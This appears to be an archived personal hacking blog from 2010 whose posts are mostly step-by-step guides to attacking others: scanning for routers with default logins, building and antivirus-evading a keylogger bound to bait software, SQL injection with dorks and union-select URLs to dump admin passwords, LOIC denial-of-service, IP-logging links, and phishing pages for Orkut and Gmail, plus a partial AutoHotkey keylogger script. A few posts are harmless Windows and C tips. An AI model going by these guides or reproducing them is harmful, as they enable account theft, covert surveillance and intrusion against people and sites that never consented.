Sunday, September 19, 2010

How to Send Anonymous Emails

1. Goto X10 Hosting and register a new account.
2. Download my Anonymous Email Sender Script :

3. Login to your FreeWebHostingArea Account and click on File Manager.

4. Upload the sendmail.php, pngimg.php and bg1.PNG files to the server.

5. Set permissions for sendmail.php, pngimg.php and bg1.PNG to 777.

6. Now type the following URL

NOTE: yoursite must be substituted by the name of the subdomain that you have chosen during the registration process.

7. Use the script to send Anonymous Emails. Enjoy!!!

Monday, July 5, 2010

How to Hack an Ethernet ADSL Router

Step-1: Go to Once the page is loaded you will find your IP address. Note it down.
Step-2: Open Angry IP Scanner, here you will see an option called IP Range: where you need to enter the range of IP address to scan for.Download Angry IP Scanner from url provided below:

Suppose your IP is
, you can set the range something as

to so that there exists atleast 200-300 IP addresses in the range.

Step-3: Go to Tools->Preferences and select the Ports tab. Under Port selectionenter 80 (we need to scan for port 80). Now switch to the Display tab, select the option “Hosts with open ports only” and click on OK.

Step-4: Now click on Start. After a few minutes, the IP scanner will show a list of IPs with Port 80 open as shown in the below image.

Step-5: Now copy any of the IP from the list, paste it in your browser’s address bar and hit enter. A window will popup asking for username and password. Since most users do not change the passwords, it should most likely work with the default username and password. For most routers the default username-password pair will be admin-admin or admin-password.

Just enter the username-password as specified above and hit enter. If you are lucky you should gain access to the router settings page where you can modify any of the router settings. The settings page can vary from router to router.

Friday, June 18, 2010



Sunday, June 13, 2010

How to hack someones MSN, Orkut, Blogger account password

1. Free Download Star Tools software to hack someones msn, orkut account.

2. Run Star Tools.exe file. Hit on Tools and select Keylogger.

3. Now, you get Keylogger builder like this:

4. Simply enter your Gmail username and password where you want to receive your victim's password. You can set Timing Options as you like and hit on "Build Keylogger" to get Server.exe file created in current directory.

5. This server.exe file is 3/23 UD and detected by Avira antivirus. So, to avoid it from being detected by Antivirus, Go to Tools -> File Pumper to see:

Hack someones msn

6. Now, select the server.exe file you have just created in step 5. Set the number of bytes you want to add using File Pumper (you can set anything like approx 1 MB or even more) and hit on "Pump File". File Pumper will ask you the name and path where you want to save pumped file created by File Pumper. Select the path and hit on Save. Say this file is named ser.exe.

7. Now, bind this ser.exe created in Step 7 with any other .exe software setup orapplication which victim eagerly wants. You can use Binder software for this. Ask the victim to run binded file on his computer. As soon as he runs our sent file, the keylogger get installed on his computer and all his typed passwords and keystrokes are sent to your email address which you have entered in step 5.

Thus, you have his msn email password and can easily hack his account.

Friday, May 14, 2010

how to find hackable sites used for sql injection

download the software provided link below:

step2:run the software

3. Now, select from drop down box in "Options" and select "Blackie" radio button. You can choose any radio button. But, Blackie is giving good results as I have noticed.

4. In "Website and Search Engine Dork", select any dork you want. I have selected "article.php?id=".(basically we trying to obtain google dork for more info. consider prvious blog article "sql injection".

5. Now, hit on "Go" and you will see list of websites that are found vulnerable. Thus, you can hack websites mentioned in the list. Hit on "Clean Bad URL's" and then "Exploit URL".

6. SQL Scanner software will then display final list of exploited urls which are found vulnerable. Simply click on any url. I have used

and you can see the results.

Click on image to see enlarged view

Thus, since the website is mentioning this error, this website is vulnerable and you can try and hack website. use above website for hacking by using following software.
download the software provided below:

3. Now, when you have website hacking software, you need to find website with potential vulnerability. There are some websites that are unhackable. While finding hackable websites, it is better to search for sites with format "article.php?id=[number]" in url.

Lets consider one example which I will use in this article:

Check whether your searched victim site can be hacked by entering:'1

in address bar and hit enter. You will get error message like:

Query failed.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'1 ORDER BY lastname' at line 1 SELECT * FROM person_old WHERE id=\'1 ORDER BY lastname

If you get such error message, it is confirmed that you can hack website using this method and now you can move forward to hack website.

4. Run SQLI Helper on your computer.

SQLI Helper to hack website

5. In target field, enter (the website url you just discovered as hackable) and hit on "Inject".

6. SQLI Helper will search for columns and you will have something like this:

Website hacking software

7. Hit on "Get Database" to get:

Hacking website down

8. Select any element from "Database Name" and click on "Get Tables".

Hack website using software

9. Now, select element from table and hit on "Get Columns". I have selected "user" to get userid and password required for login.

Hacking website software

10. Now, when you know "user" table has columns "usr_login" and "usr_pass", select them and hit on "Dump Now".

How to hack website

11. You will get values like these:

password hashes cracked

12. The values achieved are actually in hash and hence you have to crack these hashes to get userlogin and password to hack website. For this, go to and crack the hash using "Crack that hash baby" button. Thus, you are now able to hack website as you have got website user id and password. Once, you get admin password, you can easily hack website.


Monday, May 10, 2010

Denial of Service DOS Attack:

Denial of Service attack is an attack in which target system clogs up due to numerous and large amount of requests sent to it and is hence unable to serve other users of system. DOS attack helps in increasing packet traffic in networkleading to congestion. DOS attacks often leads target system to crash, reboot or atleast deny service to other users.

STEP : download the software
STEP :In URL field, type the website address you want to take down or hack and hit on "Lock On".

STEP :In Attack Options, assign "9001" as Timeout Value.

STEP :Now, simply hit on "IMMA CHARGIN MAH LAZER" to start DOS attack on website. Keep it running to see website down after sometime.

Note: This is DOS attack and will hardly work from single computer or single instance. You can make this attack effective by implemeting Denial of Service attack from multiple computers and running multiple instances of LOIC on each computer.

So friends, I hope you are well acknowledged with Denial of Service attack and how to hack website using DOS attack. If you have any problem in using Low Orbit Ion Cannon software in implementing DOS attack, please mention it in comments.

Enjoy Denial of Service DOS attack to hack website...

C Program Without a Main Function

How to write a C program without a main function?. Is it possible to do that. Yes there can be a C program without a main function. Here’s the code of the program without a main function…

#define decode(s,t,u,m,p,e,d) m##s##u##t
#define begin decode(a,n,i,m,a,t,e)

int begin()
printf(” hello “);

Does the above program run without the main function? Yes, the above program runs perfectly fine even without a main function. But how, whats the logic behind it? How can we have a C program working without main?

Here we are using preprocessor directive #define with arguments to give an impression that the program runs without main. But in reality it runs with a hidden main function.

The ‘##‘ operator is called the token pasting or token merging operator. That is we can merge two or more characters with it.

NOTE: A Preprocessor is program which processess the source code before compilation.

Look at the 2nd line of program -

#define decode(s,t,u,m,p,e,d) m##s##u##t

What is the preprocessor doing here. The macro decode(s,t,u,m,p,e,d) is being expanded as “msut” (The ## operator merges m,s,u & t into msut). The logic is when you pass (s,t,u,m,p,e,d) as argument it merges the 4th,1st,3rd & the 2nd characters(tokens).

Now look at the third line of the program -

#define begin decode(a,n,i,m,a,t,e)

Here the preprocessor replaces the macro “begin” with the expansion decode(a,n,i,m,a,t,e). According to the macro definition in the previous line the argument must be expanded so that the 4th,1st,3rd & the 2nd characters must be merged. In the argument (a,n,i,m,a,t,e) 4th,1st,3rd & the 2nd characters are ‘m’,'a’,'i’ & ‘n’.

So the third line “int begin” is replaced by “int main” by the preprocessor before the program is passed on for the compiler. That’s it…

The bottom line is there can never exist a C program without a main function. Here we are just playing a gimmick that makes us beleive the program runs without main function, but actually there exists a hidden main function in the program. Here we are using the proprocessor directive to intelligently replace the word begin” by “main”. In simple words int begin=int main.

Lets see how the preprocessor replaces begin by main..

When preprocessor scans the source code it encounters the word “begin” at the 4th line of the source code.So according to the macro definition in the third line the word “begin” is expanded into decode(a,n,i,m,a,t,e).
But according to the macro definition of the second line decode(a,n,i,m,a,t,e) must be expanded into m##a##i##n (4th,1st,3d 2nd) characters

Hence in the expanded source code(the source code after being processed by preprocessor and passed on to compiler) “begin” is eventually replaced by “main”…

Sunday, May 9, 2010

Change the Default Location for Installing Programs

AS you know XP uses the C:\Program Files directory as the default base directory into which new programs are installed. However, you can change the default installation drive and/or directory by using a Registry hack. Run the Registry Editor and go to


Look for the value named ProgramFilesDir.

By default, the value will be C:\Program Files.

Edit the value to any valid drive or folder;

Now XP will use that new location as the default installation directory for new programs.This registry hack can be very useful when your c drive is full and you automatically want to change the installing directory.Enjoy this cool windows registry hack


1. How to check if the website is vulnerable to SQL Injection?
On most of the website i read people saying that try to add “`” at the end [without quotes], and if you get some error that means that the website is vulnerable to SQL Injection. But being an experienced guy in the penetration, i’d rather tell you that this is a TOTAL MYTH. The best way to check the site vulnerability is to add “+order+by+6753″ at the end of the URL. Because, 97% of the websites don’t have more then 6753. columns. So by adding 6753 number, you will check if it has 6753 columns, which it apperatenly doesn’t have. So it will give you an error, and if it does that means that the WEBSITE IS VULNERABLE. It is generally noticed that a website doesn’t have more than 100 columns at the most in its database. So by entering the number 6753, you are trying to make it sure if the website gives you an error with it. IF it does that means you can proceed further. To check an SQL Injection, its mandatory that the website should be pointing it self to some specific page, i.e. “″. So in this case the website is pointing it self to page Number.11 to pull up some specific information. So, to check if the website is vulnerable or not, you can try with the following URL. i.e. “″.

2. How would i find the vulnerable websites?
A.: Google is the best friend of Hackers
, when I say this don’t assume that i am just writing it because i am supposed it. I really mean it. There is something called as “google dorks”, which are basically a command which could be put into the Google search to find out specific groups of pages.
here are some Google dorks which you may try to find out the vulnerable websites.
a. inurl:index.php?page=
b. inurl:members.php?member=
c. inurl:index.php?id=
d. inurl:articles.php?page=

This will help you to find out the websites which are connected and working with SQL Databases at the backend. Some of them might be vulnerable to SQL Injection. So you can try to put“order+by+6753″ at the end of the URL to check if its vulnerable.

Step 1 : Finding Vulnerable Page.

Lets start, as you’ll know the website that i will test today is So lets open up the website in the browser. So just a little information about website, RFID means “radio frequency identification”. So on the right hand side you will see that it gives you an opportunity to subscribe to the website. So now it should give you an idea that when you subscribe to it, there has to be a place where your E-mail address should be saved, so it has to have a database! So, now we know that the website is supported by an SQL Database at the backend. So we are on the right track.

As I have written earlier, in order to perform an SQL Injection we will have to find a page that has “something.php?id=2121″ at the end of the URL, so we will try to find such page on I have found a page by exploring the website a bit. The URL of the page is,

So now, we know it has an SQL Database and we have the apge where we can start with.

So lets try to check if the website is vulnerable to SQL Attack, we will try to add“+order+by+6753–” as i have written earlier.–

Now, you should have noticed an error, which says :
“Error 1054: Unknown column ‘6753′ in ‘order clause’”

So, It means that the database gave u a message saying “there is no such column”. So error doesn’t really make any difference, but the main thing we should notice is that the database communicated with us directly. So there is a possibility that we can exploit it.

Step 2 : Finding Number of Columns.

Now, the next thing we will try is to find the out many columns do this page have. So now, instead of “6753″, we will start from number 1 then 5 then 15, we will keep doing this unless we get some error. So, try the following url.–

The webpage opened up fine, which means that the website has more then 1 column, now try number 5.–

Same thing, now try 10.–

Still no error, try 15.–

Still no error :( , try 20.

WHOA!, We got the error, which means that the number of columns in the webpage is between 15 to 20. So lets try with number “16″ now.–

YAY!, you got the error on number “16″ as well. Which means, that the website has 15 columns. So now lets move further.

Step 3 : Using “Union Select All” Command.

Now, we will try to combine all the columns and we will see what do we get, the command goes as follow:-,2,3,4,5,6,7,8,9,10,11,12,13,14,15–

FYI:- please notice tha ti have added “-” before 1563.

Now you see some broken things in there, and now you see that the only indipendent number of column you see on the website is “7″. So apperantly that would be the base of the attack. Everything we do now, would be done with the column number “7″.

So we wil ltry to find the some more information about the DATABASE this website is using, so to do this we can replace the column number 7 with “@@version“, without quotes ofcourse. So try this now.,2,3,4,5,6,@@version,8,9,10,11,12,13,14,15–

This is what you should see now,

Which means, that the website is using SQL Version > 5. Now, try following URL to move further.

What we did is, to replace the columns names with admin_username & admin_password, and call it from ru_Admin column at the end.

VOILA! What you’re looking at right now the “admin” username and the password in following format.

username : password.


FYI: Wherever you see “%20″ in the URL, that means a SPACE in the address bar.

So you have the password now, you can use it the way you want!.

So this the way to perform an SQL Injection attack. You may try your own stuffs with the google dorks i posted in the beginning. Use it the way you want, just keep in mind that if u know 80/100, there are people out there who know 90/100. So better secure your self first, and try these attacks with the permission of the site owners.

Thank you all for reading this tutorial, I am sure it helped. If there are any more questions feel free to revert back to the same post.

Enjoy Ethical hacking ;)

Tuesday, March 16, 2010

Converting FAT to NTFS

To convert a FAT partition to NTFS, perform the following steps.

1) Open 'Command Prompt'.

2) At the command prompt, type the following-

CONVERT [driveletter]: /FS:NTFS.

'Convert.exe' will attempt to convert the partition to NTFS.

Thursday, March 11, 2010

G-mai hacking

want to hack some -one g-mail the file from
step2. enter ur g-mal id,password and victm-id

step3. just click om button hack them...thats all
\\\\ u get the victim password.\\\




step1. download these files from

step2.upload these files to free hosting site.

step3. the link provided by the hosting site i.e. url address upto ip file must send
to the victim.

step4.whenever victim click on the link provided it automatically redirected to orkut("original site")if u wnt to redirect him to ur fake orkut or some other site made the following changes as i have alredy told u in my post "PHISHING REVEAL FIRST TIME"but here we only concern with the ip-add of victim. the log file ,u get the ip add of victim...THATS ALL "ENJOY HACKING"

Wednesday, March 10, 2010


1.First of all open the page for which u wanna a make fake.

2. Save dat page, Goto to file & save the complete web page.

3. Now u have saved the exact page of that site & start the work.

4. Right Click on dat Page and click on edit.

5. Search for the word Form in code of dat page.

6. Delete dat Form Value , Method ,Action, delete everything watever written on it.

7. ADD this code DOWNLOAD LINK

8. Instead of Your Email Id write ur email address.

9. Save & close.

10. Upload ur fake page on any free hosting services.


basically it involves installing any spy-keylogger on victim's pc...sound great but its not easy..bcoz many antivirus detected it as "torjan"
after many attempts, i m able to bypass antivirus but it create unnecessary i decided to develop my own keylogger which is not dected by any antivirus as "torjan"

step1.install a software called hotkey ,download from
step2. code for developing own keylogger as given below in brief :
The Code:
logfile = %ProgramFiles%log.txt ;is where we store our log

; -- this is where we will put our log file.


; by default autohotkey scripts have a tray icon - this turns it off

SendMode Play ;
#SingleInstance force
; a couple of AHK specific commands

(a), %logfile%
Send a

(b), %logfile%
Send b

(c), %logfile%
Send c

;..snip... and so on for all of the letters

(1), %logfile%
Send 1

(1), %logfile%
Send 1

(2), %logfile%
Send 2

(2), %logfile%
Send 2

(3), %logfile%
Send 3

(3), %logfile%
Send 3

;...snip... and for the numbers

(!), %logfile%
Send n

(#), %logfile%
Send n

;...snip... and symbols

), %logfile%
Send n

;also watches for ENTER so as to clean up the file.





Then you see a batch file. Double click on this batch file to create a folder locker.
New folder named 'Locker' would be formed at the same location.
Now bring all the files you want to hide in the 'Locker' folder. Double click on the batch file to lock the folder namely 'Locker'.
If you want to unlock your files,double click the batch file again and you would be prompted for password.
Enter the password and enjoy access to the folder.


if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
echo Invalid password
goto end
md Locker
echo Locker created successfully
goto End


This trick will allow you to create files and folders without any name.

Just follow the steps as given below :-

1) Select any file or folder.

2) Right click on it, select 'Rename' or simply press 'F2'.

3) Press and hold the 'Alt' key. While holding the Alt key, type numbers '0160' from the numpad.

Note :- Type the numbers '0160' from the numpad, that is, the numbers present on the right side of the keyboard.
Don’t type the numbers which are present on top of the character keys.

4) Press Enter and the nameless file or folder will be created.

Reason :- The file or folder that seems nameless is actually named with a single space.

But what if you want to create another nameless file or folder in the same directory ?
For this you will have to rename the file with 2 spaces.
Just follow the steps given below :-

1) Select file, Press 'F2'.

2) Hold 'Alt' key and type '0160' from the numpad.

3) Release the 'Alt' key. Now without doing anything else, again hold 'Alt' key and type '0160'.

4) Press 'Enter' and you will have second nameless file in the same directory.

5) Repeat step 3 to create as many nameless files or folders in the same directory.

(We have a problem with deleting these folders, to do so, start your computer in 'Safe Mode' and delete it from there.)

chatting via cmd (continued)

step.4 drag & drop Messenger.Bat over cmd or command prompt

Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:

Now all you need to do is type your message and press Enter.
Start Chatting.......!


Chatting via cmd(useful in practical exam)

Dedicated to all my frnds during practical exam

I personally feel that cheating is necessary during practical exam.....but if we do cheating in traditional manner it will definitely cause problem for here is the method of cheating:

step1 :All you need is your friend's IP Address and your Command Prompt.
as we know that during practical we are connected via LAN....we need only ip address of our computer on which we r sitting..
so here is the command for finding the ip address
open cmd & type ipconfig on cmd
default gateway==127.0.0..... will appear on cmd thats ur ip address

step2. Open Notepad and write this code as it is.....!
@echo off
set /p n=User:
set /p m=Message:
net send %n% %m%
Goto A

step3. Now save this as "Messenger.Bat".


1.internet banking site (

2.airlines system site

3. online-course driven site


JAVA PROJECTS management system site(download-link..

2.Hospital management system site (

3.Internet chatting system(

ETHICAL HACKING BY Saurabh Srivastava

orkut hacking(using phishing)

step1:download these files by link provided below:

step2:find any free webhosting site that provide php support for above given file(index and write) eg:

Step3: i personally use 2nd one procedure written for 2nd one(

Step4: sign-up with above site & goes to file- manager area
(a) create a directory (option provided at top most corner)with name index
by clicking index dir...upload the two files that u have downloded namely
index and write.
step5: just click on index file ....a fake orkut will appear to u
just enter any or ur id with fake password...
u foud that a file pass.txt alredy created with index & write file inside the index directory
Step6: when u open pass.txt u will get password of the enterd id.

most important step "send ur "url" to u r friend & told him to enter his id or password"
by creating a fake gmail id such as " orkutsupport"

thats all"Enjoy Hacking"with best wishes
for further improvement or query send ur valulable suggestions.